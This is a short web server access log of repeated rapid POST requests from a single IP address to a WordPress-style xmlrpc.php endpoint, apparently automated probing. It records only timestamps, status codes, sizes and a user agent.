196.251.85.75 - - [20/Oct/2025:10:29:01 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:01 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:02 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:02 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:03 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:03 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:04 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:04 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:05 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:05 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:06 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:06 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:07 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:07 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:08 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:29:08 -0400] "POST //xmlrpc.php HTTP/2.0" 200 403 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
